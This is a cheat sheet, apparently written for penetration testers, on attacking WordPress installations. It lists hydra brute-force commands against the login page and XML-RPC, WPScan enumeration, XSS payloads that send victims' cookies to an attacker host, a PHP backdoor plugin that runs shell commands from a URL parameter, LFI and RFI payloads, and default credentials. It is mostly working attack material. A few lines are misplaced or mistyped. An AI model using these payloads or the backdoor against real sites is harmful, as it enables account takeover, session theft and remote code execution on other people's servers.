Exploiting Wordpress

Brute-Forcing Login Credentials:

# Default Password
admin/admin or admin/password

# BruteForce
hydra -l admin -P wordlist.txt <target> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username"

Enumerating with WPScan:

• Plugins: wpscan --url <target> --enumerate p

• Themes: wpscan --url <target> --enumerate t

• Users: wpscan --url <target> --enumerate u

• Vulnerabilities: wpscan --url <target> --enumerate vp,vt

Exploiting Vulnerable Plugins:

#  Check 
/wp-content/plugins/: curl http://<target>/wp-content/plugins/readme.txt

# Look for exploit on searchsploit
searchsploit <plugin_name> <version>

# LiteSpeed Cache (<= 5.7, CVE-2023-40000): 
<script>document.location='http://<attacker_ip>/steal?cookie='+document.cookie;</script>

• Upload, activate, access: http://<target>/?cmd=whoam

Uploading a Malicious Plugin:

• Dashboard > Plugins > Add New > Upload Plugin

• Create backdoor.php, zip it:

  <?php
  add_action('wp_footer', 'my_backdoor');
  function my_backdoor() {
      if (isset($_GET['cmd'])) {
          system($_GET['cmd']);
      }
  }
  ?>

• Upload, activate, access: http://<target>/?cmd=whoami

Exploiting XML-RPC for DoS or Brute-Force:

• # Check: 
  curl http://<target>/xmlrpc.php
  
  # Brute-force
   hydra -l admin -P wordlist.txt <target> http-post-form "/xmlrpc.php:<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>^USER^</value></param><param><value>^PASS^</value></param></params></methodCall>:Invalid"

Cross-Site Scripting (XSS) via Plugins:

• WP Statistics (<= 14.5, CVE-2024-2194): <script>alert('XSS');</script>

• Steal cookies: <script>document.location='http://<attacker_ip>/steal?cookie='+document.cookie;</script>

PHPMyAdmin

• root/root or admin/admin

• SQL injection in login page

LFI/RFI

• LFI: ?page=../../../../etc/passwd

• RFI: ?page=http://<attacker>/malicious.php

Inject webshell using SQL query

Reffer -> https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/